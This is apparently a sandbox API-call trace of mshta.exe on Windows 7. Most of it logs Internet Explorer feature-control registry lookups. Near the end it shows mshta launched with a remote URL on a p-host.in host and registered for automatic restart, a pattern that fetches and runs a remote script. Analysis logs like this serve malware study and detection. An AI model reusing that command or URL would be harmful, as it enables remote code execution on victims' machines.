[0067.332] RegOpenKeyExW (in: hKey=0x78, lpSubKey="FEATURE_ARIA_SUPPORT", ulOptions=0x0, samDesired=0x1, phkResult=0x20f088 | out: phkResult=0x20f088*=0x0) returned 0x2
[0067.332] RegCloseKey (hKey=0x0) returned 0x6
[0067.332] RegCloseKey (hKey=0x0) returned 0x6
[0067.332] RegCloseKey (hKey=0x78) returned 0x0
[0067.332] RegCloseKey (hKey=0x7c) returned 0x0
[0067.332] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x20f0f8 | out: phkResult=0x20f0f8*=0x7c) returned 0x0
[0067.332] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x20f100 | out: phkResult=0x20f100*=0x78) returned 0x0
[0067.332] RegOpenKeyExW (in: hKey=0x78, lpSubKey="FEATURE_LEGACY_DISPPARAMS", ulOptions=0x0, samDesired=0x1, phkResult=0x20f088 | out: phkResult=0x20f088*=0x0) returned 0x2
[0067.332] RegOpenKeyExW (in: hKey=0x7c, lpSubKey="FEATURE_LEGACY_DISPPARAMS", ulOptions=0x0, samDesired=0x1, phkResult=0x20f088 | out: phkResult=0x20f088*=0x80) returned 0x0
[0067.332] SHRegGetValueW () returned 0x2
[0067.332] SHRegGetValueW () returned 0x2
[0067.332] RegCloseKey (hKey=0x80) returned 0x0
[0067.332] RegCloseKey (hKey=0x0) returned 0x6
[0067.332] RegCloseKey (hKey=0x0) returned 0x6
[0067.332] RegCloseKey (hKey=0x7c) returned 0x0
[0067.332] RegCloseKey (hKey=0x78) returned 0x0
[0067.332] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x20f0f8 | out: phkResult=0x20f0f8*=0x78) returned 0x0
[0067.333] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x20f100 | out: phkResult=0x20f100*=0x7c) returned 0x0
[0067.333] RegOpenKeyExW (in: hKey=0x7c, lpSubKey="FEATURE_PRIVATE_FONT_SETTING", ulOptions=0x0, samDesired=0x1, phkResult=0x20f088 | out: phkResult=0x20f088*=0x0) returned 0x2
[0067.333] RegOpenKeyExW (in: hKey=0x78, lpSubKey="FEATURE_PRIVATE_FONT_SETTING", ulOptions=0x0, samDesired=0x1, phkResult=0x20f088 | out: phkResult=0x20f088*=0x0) returned 0x2
[0067.333] RegCloseKey (hKey=0x0) returned 0x6
[0067.333] RegCloseKey (hKey=0x0) returned 0x6
[0067.333] RegCloseKey (hKey=0x78) returned 0x0
[0067.333] RegCloseKey (hKey=0x7c) returned 0x0
[0067.333] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x20f0f8 | out: phkResult=0x20f0f8*=0x7c) returned 0x0
[0067.333] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x20f100 | out: phkResult=0x20f100*=0x78) returned 0x0
[0067.333] RegOpenKeyExW (in: hKey=0x78, lpSubKey="FEATURE_CSS_SHOW_HIDE_EVENTS", ulOptions=0x0, samDesired=0x1, phkResult=0x20f088 | out: phkResult=0x20f088*=0x0) returned 0x2
[0067.333] RegOpenKeyExW (in: hKey=0x7c, lpSubKey="FEATURE_CSS_SHOW_HIDE_EVENTS", ulOptions=0x0, samDesired=0x1, phkResult=0x20f088 | out: phkResult=0x20f088*=0x0) returned 0x2
[0067.333] RegCloseKey (hKey=0x0) returned 0x6
[0067.333] RegCloseKey (hKey=0x0) returned 0x6
[0067.333] RegCloseKey (hKey=0x7c) returned 0x0
[0067.333] RegCloseKey (hKey=0x78) returned 0x0
[0067.333] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x20f0f8 | out: phkResult=0x20f0f8*=0x78) returned 0x0
[0067.333] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x20f100 | out: phkResult=0x20f100*=0x7c) returned 0x0
[0067.333] RegOpenKeyExW (in: hKey=0x7c, lpSubKey="FEATURE_DISPLAY_NODE_ADVISE_KB833311", ulOptions=0x0, samDesired=0x1, phkResult=0x20f088 | out: phkResult=0x20f088*=0x0) returned 0x2
[0067.333] RegOpenKeyExW (in: hKey=0x78, lpSubKey="FEATURE_DISPLAY_NODE_ADVISE_KB833311", ulOptions=0x0, samDesired=0x1, phkResult=0x20f088 | out: phkResult=0x20f088*=0x0) returned 0x2
[0067.333] RegCloseKey (hKey=0x0) returned 0x6
[0067.333] RegCloseKey (hKey=0x0) returned 0x6
[0067.333] RegCloseKey (hKey=0x78) returned 0x0
[0067.333] RegCloseKey (hKey=0x7c) returned 0x0
[0067.333] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x20f0f8 | out: phkResult=0x20f0f8*=0x7c) returned 0x0
[0067.333] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x20f100 | out: phkResult=0x20f100*=0x78) returned 0x0
[0067.333] RegOpenKeyExW (in: hKey=0x78, lpSubKey="FEATURE_ALLOW_EXPANDURI_BYPASS", ulOptions=0x0, samDesired=0x1, phkResult=0x20f088 | out: phkResult=0x20f088*=0x0) returned 0x2
[0067.333] RegOpenKeyExW (in: hKey=0x7c, lpSubKey="FEATURE_ALLOW_EXPANDURI_BYPASS", ulOptions=0x0, samDesired=0x1, phkResult=0x20f088 | out: phkResult=0x20f088*=0x0) returned 0x2
[0067.333] RegCloseKey (hKey=0x0) returned 0x6
[0067.334] RegCloseKey (hKey=0x0) returned 0x6
[0067.334] RegCloseKey (hKey=0x7c) returned 0x0
[0067.334] RegCloseKey (hKey=0x78) returned 0x0
[0067.334] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x20f0f8 | out: phkResult=0x20f0f8*=0x78) returned 0x0
[0067.334] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x20f100 | out: phkResult=0x20f100*=0x7c) returned 0x0
[0067.334] RegOpenKeyExW (in: hKey=0x7c, lpSubKey="FEATURE_BODY_SIZE_IN_EDITABLE_IFRAME_KB943245", ulOptions=0x0, samDesired=0x1, phkResult=0x20f088 | out: phkResult=0x20f088*=0x0) returned 0x2
[0067.334] RegOpenKeyExW (in: hKey=0x78, lpSubKey="FEATURE_BODY_SIZE_IN_EDITABLE_IFRAME_KB943245", ulOptions=0x0, samDesired=0x1, phkResult=0x20f088 | out: phkResult=0x20f088*=0x0) returned 0x2
[0067.334] RegCloseKey (hKey=0x0) returned 0x6
[0067.334] RegCloseKey (hKey=0x0) returned 0x6
[0067.334] RegCloseKey (hKey=0x78) returned 0x0
[0067.334] RegCloseKey (hKey=0x7c) returned 0x0
[0067.334] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x20f0f8 | out: phkResult=0x20f0f8*=0x7c) returned 0x0
[0067.334] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x20f100 | out: phkResult=0x20f100*=0x78) returned 0x0
[0067.334] RegOpenKeyExW (in: hKey=0x78, lpSubKey="FEATURE_DATABINDING_SUPPORT", ulOptions=0x0, samDesired=0x1, phkResult=0x20f088 | out: phkResult=0x20f088*=0x0) returned 0x2
[0067.334] RegOpenKeyExW (in: hKey=0x7c, lpSubKey="FEATURE_DATABINDING_SUPPORT", ulOptions=0x0, samDesired=0x1, phkResult=0x20f088 | out: phkResult=0x20f088*=0x0) returned 0x2
[0067.334] RegCloseKey (hKey=0x0) returned 0x6
[0067.334] RegCloseKey (hKey=0x0) returned 0x6
[0067.334] RegCloseKey (hKey=0x7c) returned 0x0
[0067.334] RegCloseKey (hKey=0x78) returned 0x0
[0067.334] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x20f0f8 | out: phkResult=0x20f0f8*=0x78) returned 0x0
[0067.334] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x20f100 | out: phkResult=0x20f100*=0x7c) returned 0x0
[0067.334] RegOpenKeyExW (in: hKey=0x7c, lpSubKey="FEATURE_ENFORCE_BSTR", ulOptions=0x0, samDesired=0x1, phkResult=0x20f088 | out: phkResult=0x20f088*=0x0) returned 0x2
[0067.334] RegOpenKeyExW (in: hKey=0x78, lpSubKey="FEATURE_ENFORCE_BSTR", ulOptions=0x0, samDesired=0x1, phkResult=0x20f088 | out: phkResult=0x20f088*=0x0) returned 0x2
[0067.334] RegCloseKey (hKey=0x0) returned 0x6
[0067.334] RegCloseKey (hKey=0x0) returned 0x6
[0067.334] RegCloseKey (hKey=0x78) returned 0x0
[0067.334] RegCloseKey (hKey=0x7c) returned 0x0
[0067.334] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x20f0f8 | out: phkResult=0x20f0f8*=0x7c) returned 0x0
[0067.334] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x20f100 | out: phkResult=0x20f100*=0x78) returned 0x0
[0067.335] RegOpenKeyExW (in: hKey=0x78, lpSubKey="FEATURE_ENABLE_DYNAMIC_OBJECT_CACHING", ulOptions=0x0, samDesired=0x1, phkResult=0x20f088 | out: phkResult=0x20f088*=0x0) returned 0x2
[0067.335] RegOpenKeyExW (in: hKey=0x7c, lpSubKey="FEATURE_ENABLE_DYNAMIC_OBJECT_CACHING", ulOptions=0x0, samDesired=0x1, phkResult=0x20f088 | out: phkResult=0x20f088*=0x0) returned 0x2
[0067.335] RegCloseKey (hKey=0x0) returned 0x6
[0067.335] RegCloseKey (hKey=0x0) returned 0x6
[0067.335] RegCloseKey (hKey=0x7c) returned 0x0
[0067.335] RegCloseKey (hKey=0x78) returned 0x0
[0067.335] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0067.335] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x20f0f8 | out: phkResult=0x20f0f8*=0x7c) returned 0x0
[0067.335] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x20f100 | out: phkResult=0x20f100*=0x80) returned 0x0
[0067.335] RegOpenKeyExW (in: hKey=0x80, lpSubKey="FEATURE_LEGACY_TOSTRING_IN_COMPATVIEW", ulOptions=0x0, samDesired=0x1, phkResult=0x20f088 | out: phkResult=0x20f088*=0x0) returned 0x2
[0067.335] RegOpenKeyExW (in: hKey=0x7c, lpSubKey="FEATURE_LEGACY_TOSTRING_IN_COMPATVIEW", ulOptions=0x0, samDesired=0x1, phkResult=0x20f088 | out: phkResult=0x20f088*=0x0) returned 0x2
[0067.335] RegCloseKey (hKey=0x0) returned 0x6
[0067.335] RegCloseKey (hKey=0x0) returned 0x6
[0067.335] RegCloseKey (hKey=0x7c) returned 0x0
[0067.336] RegCloseKey (hKey=0x80) returned 0x0
[0067.336] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x20f0f8 | out: phkResult=0x20f0f8*=0x80) returned 0x0
[0067.336] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x20f100 | out: phkResult=0x20f100*=0x7c) returned 0x0
[0067.336] RegOpenKeyExW (in: hKey=0x7c, lpSubKey="FEATURE_ENABLE_OM_SCREEN_ORIGIN_DISPLAY_PIXELS", ulOptions=0x0, samDesired=0x1, phkResult=0x20f088 | out: phkResult=0x20f088*=0x0) returned 0x2
[0067.336] RegOpenKeyExW (in: hKey=0x80, lpSubKey="FEATURE_ENABLE_OM_SCREEN_ORIGIN_DISPLAY_PIXELS", ulOptions=0x0, samDesired=0x1, phkResult=0x20f088 | out: phkResult=0x20f088*=0x0) returned 0x2
[0067.336] RegCloseKey (hKey=0x0) returned 0x6
[0067.336] RegCloseKey (hKey=0x0) returned 0x6
[0067.336] RegCloseKey (hKey=0x80) returned 0x0
[0067.336] RegCloseKey (hKey=0x7c) returned 0x0
[0067.336] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x20f0f8 | out: phkResult=0x20f0f8*=0x7c) returned 0x0
[0067.336] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x20f100 | out: phkResult=0x20f100*=0x80) returned 0x0
[0067.336] RegOpenKeyExW (in: hKey=0x80, lpSubKey="FEATURE_RESTRICT_CRASH_RECOVERY_SAVE_KB978454", ulOptions=0x0, samDesired=0x1, phkResult=0x20f088 | out: phkResult=0x20f088*=0x0) returned 0x2
[0067.336] RegOpenKeyExW (in: hKey=0x7c, lpSubKey="FEATURE_RESTRICT_CRASH_RECOVERY_SAVE_KB978454", ulOptions=0x0, samDesired=0x1, phkResult=0x20f088 | out: phkResult=0x20f088*=0x0) returned 0x2
[0067.336] RegCloseKey (hKey=0x0) returned 0x6
[0067.336] RegCloseKey (hKey=0x0) returned 0x6
[0067.336] RegCloseKey (hKey=0x7c) returned 0x0
[0067.336] RegCloseKey (hKey=0x80) returned 0x0
[0067.336] GetSystemMetrics (nIndex=68) returned 4
[0067.336] GetSystemMetrics (nIndex=69) returned 4
[0067.336] GetProfileIntA (lpAppName="windows", lpKeyName="DragDelay", nDefault=20) returned 0x14
[0067.337] GetSystemDefaultLCID () returned 0x409
[0067.337] GetVersionExW (in: lpVersionInformation=0x20f0f0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x20f0f0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0067.337] GetUserDefaultUILanguage () returned 0x409
[0067.337] GetLocaleInfoW (in: Locale=0x409, LCType=0x58, lpLCData=0x20ef90, cchData=16 | out: lpLCData="\x03") returned 16
[0067.348] GetKeyboardLayoutList (in: nBuff=32, lpList=0x20eff0 | out: lpList=0x20eff0) returned 1
[0067.348] GetSystemMetrics (nIndex=4096) returned 0
[0067.349] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x20f158 | out: phkResult=0x20f158*=0x80) returned 0x0
[0067.349] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x20f160 | out: phkResult=0x20f160*=0x7c) returned 0x0
[0067.349] RegOpenKeyExW (in: hKey=0x7c, lpSubKey="FEATURE_CLEANUP_AT_FLS", ulOptions=0x0, samDesired=0x1, phkResult=0x20f0e8 | out: phkResult=0x20f0e8*=0x0) returned 0x2
[0067.349] RegOpenKeyExW (in: hKey=0x80, lpSubKey="FEATURE_CLEANUP_AT_FLS", ulOptions=0x0, samDesired=0x1, phkResult=0x20f0e8 | out: phkResult=0x20f0e8*=0x0) returned 0x2
[0067.349] RegCloseKey (hKey=0x0) returned 0x6
[0067.349] RegCloseKey (hKey=0x0) returned 0x6
[0067.349] RegCloseKey (hKey=0x80) returned 0x0
[0067.349] RegCloseKey (hKey=0x7c) returned 0x0
[0067.349] GetModuleFileNameW (in: hModule=0x7fee0880000, lpFilename=0x20f000, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\mshtml.dll" (normalized: "c:\\windows\\system32\\mshtml.dll")) returned 0x1e
[0067.349] RegisterClipboardFormatA (lpszFormat="Embedded Object") returned 0xc00a
[0067.349] RegisterClipboardFormatA (lpszFormat="Embed Source") returned 0xc00b
[0067.349] RegisterClipboardFormatA (lpszFormat="Link Source") returned 0xc00d
[0067.349] RegisterClipboardFormatA (lpszFormat="Link Source Descriptor") returned 0xc00f
[0067.349] RegisterClipboardFormatA (lpszFormat="Object Descriptor") returned 0xc00e
[0067.349] RegisterClipboardFormatA (lpszFormat="MS Forms CLSID") returned 0xc194
[0067.349] RegisterClipboardFormatA (lpszFormat="MS Forms Text") returned 0xc195
[0067.349] GetDC (hWnd=0x0) returned 0x80108d2
[0067.349] SHCreateShellPalette (hdc=0x0) returned 0x1080912
[0067.349] GetPaletteEntries (in: hpal=0x1080912, iStart=0x0, cEntries=0x100, pPalEntries=0x7fee1043224 | out: pPalEntries=0x7fee1043224) returned 0x100
[0067.349] SHGetInverseCMAP (in: pbMap=0x7fee1046308, cbMap=0x8 | out: pbMap=0x7fee1046308) returned 0x0
[0067.349] GetDeviceCaps (hdc=0x80108d2, index=38) returned 32409
[0067.349] ReleaseDC (hWnd=0x0, hDC=0x80108d2) returned 1
[0067.350] GetCurrentProcessId () returned 0x370
[0067.350] _vsnprintf (in: _DstBuf=0x20f3a0, _MaxCount=0x16, _Format="%s%08lX", _ArgList=0x20f248 | out: _DstBuf="#MSHTML#PERF#00000370") returned 21
[0067.350] OpenFileMappingA (dwDesiredAccess=0x2, bInheritHandle=0, lpName="#MSHTML#PERF#00000370") returned 0x0
[0067.350] GetVersionExW (in: lpVersionInformation=0x20f280*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x10, dwBuildNumber=0x0, dwPlatformId=0x20f388, szCSDVersion="") | out: lpVersionInformation=0x20f280*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0067.350] GetModuleHandleW (lpModuleName="advapi32") returned 0x7feff8e0000
[0067.350] GetProcAddress (hModule=0x7feff8e0000, lpProcName="EventWrite") returned 0x7782b510
[0067.350] GetProcAddress (hModule=0x7feff8e0000, lpProcName="EventRegister") returned 0x7783cac0
[0067.350] GetProcAddress (hModule=0x7feff8e0000, lpProcName="EventUnregister") returned 0x77823c80
[0067.350] EtwEventRegister (in: ProviderId=0x7fee0ef0280, EnableCallback=0x7fee08843a0, CallbackContext=0x7fee1046310, RegHandle=0x7fee1044960 | out: RegHandle=0x7fee1044960) returned 0x0
[0067.350] EtwRegisterTraceGuidsW () returned 0x0
[0067.350] EtwRegisterTraceGuidsW () returned 0x0
[0067.350] EtwEventRegister (in: ProviderId=0x7fee0ef0290, EnableCallback=0x7fee08843a0, CallbackContext=0x7fee10464c0, RegHandle=0x7fee1044968 | out: RegHandle=0x7fee1044968) returned 0x0
[0067.351] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Program Files\\Microsoft Office\\Root\\Office16\\outllib.dll", lpdwHandle=0x20eff4 | out: lpdwHandle=0x20eff4) returned 0x0
[0067.351] GetModuleHandleW (lpModuleName=0x0) returned 0xff9d0000
[0067.351] GetModuleFileNameW (in: hModule=0xff9d0000, lpFilename=0x20f000, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\mshta.exe" (normalized: "c:\\windows\\system32\\mshta.exe")) returned 0x1d
[0067.351] PathFindFileNameW (pszPath="C:\\Windows\\System32\\mshta.exe") returned="mshta.exe"
[0067.352] GetCurrentProcessId () returned 0x370
[0067.352] GetCurrentProcessId () returned 0x370
[0067.353] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Local\\!PrivacIE!SharedMemory!Mutex") returned 0x9c
[0067.353] GetLastError () returned 0xb7
[0067.353] CreateFileMappingW (hFile=0xffffffffffffffff, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x10, lpName="Local\\!PrivacIE!SharedMem!Counter") returned 0xa0
[0067.353] MapViewOfFile (hFileMappingObject=0xa0, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x100000
[0067.361] RegCloseKey (hKey=0x2a) returned 0x0
[0067.361] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x776e0000
[0067.361] GetProcAddress (hModule=0x776e0000, lpProcName="RegisterApplicationRestart") returned 0x7775f510
[0067.361] lstrlenA (lpString="http://www.samyrai777m.p-host.in/t/t.php?thread=0") returned 49
[0067.361] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x242f40, cbMultiByte=-1, lpWideCharStr=0x6c5d40, cchWideChar=50 | out: lpWideCharStr="http://www.samyrai777m.p-host.in/t/t.php?thread=0") returned 50
[0067.361] RegisterApplicationRestart (pwzCommandline="http://www.samyrai777m.p-host.in/t/t.php?thread=0", dwFlags=0x0) returned 0x0
[0067.362] GetProcAddress (hModule=0x7fee0880000, lpProcName="RunHTMLApplication") returned 0x7fee0ad5b90
[0067.362] GetCommandLineW () returned="\"C:\\Windows\\System32\\mshta.exe\" http://www.samyrai777m.p-host.in/t/t.php?thread=0"
[0067.362] OleInitialize (pvReserved=0x0) returned 0x0
[0067.412] IsWindow (hWnd=0x0) returned 0
[0067.412] RegisterClassW (lpWndClass=0x20fbd0) returned 0xc196
[0067.413] CreateWindowExW (dwExStyle=0x0, lpClassName="HTML Application Host Window Class", lpWindowName="", dwStyle=0x0, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0xff9d0000, lpParam=0x7fee10426a0) returned 0x10216
[0067.416] CreateWindowExW (dwExStyle=0x40000, lpClassName="HTML Application Host Window Class", lpWindowName="", dwStyle=0x2cf0000, X=-2147483648, Y=-2147483648, nWidth=-2147483648, nHeight=-2147483648, hWndParent=0x10216, hMenu=0x0, hInstance=0xff9d0000, lpParam=0x7fee10426a0) returned 0x1021a
[0067.416] SetWindowLongW (hWnd=0x1021a, nIndex=-16, dwNewLong=-2100363264) returned 114229248
[0067.416] SetWindowPos (hWnd=0x1021a, hWndInsertAfter=0xfffffffffffffffe, X=0, Y=0, cx=0, cy=0, uFlags=0x37) returned 1
[0067.417] SendMessageW (hWnd=0x1021a, Msg=0x127, wParam=0x3, lParam=0x0) returned 0x0
[0067.418] PathRemoveArgsW (in: pszPath="http://www.samyrai777m.p-host.in/t/t.php?thread=0" | out: pszPath="http://www.samyrai777m.p-host.in/t/t.php?thread=0")
[0067.418] PathRemoveBlanksW (in: pszPath="http://www.samyrai777m.p-host.in/t/t.php?thread=0" | out: pszPath="http://www.samyrai777m.p-host.in/t/t.php?thread=0")
[0067.418] PathUnquoteSpacesW (in: lpsz="http://www.samyrai777m.p-host.in/t/t.php?thread=0" | out: lpsz="http://www.samyrai777m.p-host.in/t/t.php?thread=0") returned 0
[0067.418] CreateURLMonikerEx (in: pMkCtx=0x0, szURL="http://www.samyrai777m.p-host.in/t/t.php?thread=0", ppmk=0x20fce0*=0x0, dwFlags=0x1 | out: ppmk=0x20fce0*=0x265140) returned 0x0
[0067.456] CoCreateInstance (in: rclsid=0x7fee0ef0cf0*(Data1=0x3050f5c8, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fee0f4de80*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x7fee1042738 | out: ppv=0x7fee1042738*=0x28d790) returned 0x0
[0067.517] GetCurrentThreadId () returned 0x628
[0067.517] RegisterClassExW (param_1=0x20e6b0) returned 0xc197
[0067.517] CreateWindowExW (dwExStyle=0x0, lpClassName=0xc197, lpWindowName=0x0, dwStyle=0x80000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x7fee0880000, lpParam=0x0) returned 0x1021c
[0067.517] GetWindowLongW (hWnd=0x1021c, nIndex=-20) returned 0
[0067.517] NtdllDefWindowProc_W () returned 0x1
[0067.517] NtdllDefWindowProc_W () returned 0x0
[0067.517] NtdllDefWindowProc_W () returned 0x0
[0067.517] NtdllDefWindowProc_W () returned 0x0
[0067.517] NtdllDefWindowProc_W () returned 0x0
[0067.518] CreateCompatibleDC (hdc=0x0) returned 0xd01091b
[0067.518] GetDeviceCaps (hdc=0xd01091b, index=90) returned 96
[0067.518] GetDeviceCaps (hdc=0xd01091b, index=88) returned 96
[0067.518] GetSystemMetrics (nIndex=68) returned 4
[0067.518] GetSystemMetrics (nIndex=69) returned 4
[0067.518] GetSystemMetrics (nIndex=2) returned 17
[0067.518] GetSystemMetrics (nIndex=3) returned 17
[0067.518] GetStockObject (i=13) returned 0x18a002e
[0067.518] SelectObject (hdc=0xd01091b, h=0x18a002e) returned 0x18a002e
[0067.518] GetTextMetricsW (in: hdc=0xd01091b, lptm=0x20e7f0 | out: lptm=0x20e7f0) returned 1
[0067.518] SelectObject (hdc=0xd01091b, h=0x18a002e) returned 0x18a002e
[0067.518] DeleteObject (ho=0x18a002e) returned 1
[0067.518] GetSystemDefaultLCID () returned 0x409
[0067.518] GetUserDefaultLCID () returned 0x409
[0067.518] GetACP () returned 0x4e4
[0067.518] GetLocaleInfoW (in: Locale=0x400, LCType=0x1014, lpLCData=0x20e740, cchData=41 | out: lpLCData="1") returned 2
[0067.518] _wtoi (_String="1") returned 1
[0067.518] RegCloseKey (hKey=0x0) returned 0x6
[0067.518] GetLocaleInfoW (in: Locale=0x400, LCType=0x13, lpLCData=0x20e720, cchData=16 | out: lpLCData="0123456789") returned 11
[0067.518] SystemParametersInfoW (in: uiAction=0x46, uiParam=0x0, pvParam=0x7fee10469c4, fWinIni=0x0 | out: pvParam=0x7fee10469c4) returned 1
[0067.518] SystemParametersInfoW (in: uiAction=0x42, uiParam=0x10, pvParam=0x20e7e0, fWinIni=0x0 | out: pvParam=0x20e7e0) returned 1
[0067.518] GetSystemWindowsDirectoryW (in: lpBuffer=0x20e610, uSize=0x104 | out: lpBuffer="C:\\Windows") returned 0xa
[0067.518] lstrlenW (lpString="C:\\Windows") returned 10
[0067.518] lstrlenW (lpString="\\WindowsShell.manifest") returned 22
[0067.518] CreateActCtxW (pActCtx=0x20e5d0) returned 0x28b918
[0067.520] ActivateActCtx (in: hActCtx=0x28b918, lpCookie=0x20e588 | out: hActCtx=0x28b918, lpCookie=0x20e588) returned 1
[0067.520] LoadLibraryW (lpLibFileName="comctl32.dll") returned 0x7fefc060000
[0067.526] DeactivateActCtx (dwFlags=0x0, ulCookie=0x100200ca00000001) returned 1
[0067.526] GetProfileIntA (lpAppName="windows", lpKeyName="DragScrollInset", nDefault=11) returned 0xb
[0067.527] GetProfileIntA (lpAppName="windows", lpKeyName="DragScrollDelay", nDefault=50) returned 0x32
[0067.527] GetProfileIntA (lpAppName="windows", lpKeyName="DragDelay", nDefault=200) returned 0xc8
[0067.527] GetProfileIntA (lpAppName="windows", lpKeyName="DragScrollInterval", nDefault=50) returned 0x32
[0067.527] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x20e770, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\mshta.exe" (normalized: "c:\\windows\\system32\\mshta.exe")) returned 0x1d
[0067.527] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x20e450, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\mshta.exe" (normalized: "c:\\windows\\system32\\mshta.exe")) returned 0x1d
[0067.527] GetCurrentProcess () returned 0xffffffffffffffff
